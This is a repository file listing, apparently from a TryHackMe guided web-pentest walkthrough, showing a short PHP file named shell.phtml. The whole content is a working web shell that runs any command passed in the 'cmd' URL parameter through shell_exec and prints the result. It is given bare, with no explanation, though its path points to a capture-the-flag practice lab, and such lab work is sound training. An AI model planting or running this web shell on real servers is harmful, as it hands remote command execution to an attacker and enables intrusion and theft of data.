Files
TryHackMe/Walkthroughs/GuidedPentestWeb/shell.phtml
T
2026-06-05 09:00:50 +02:00

6 lines
93 B
PHTML

<?php
if(isset($_GET['cmd'])) {
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>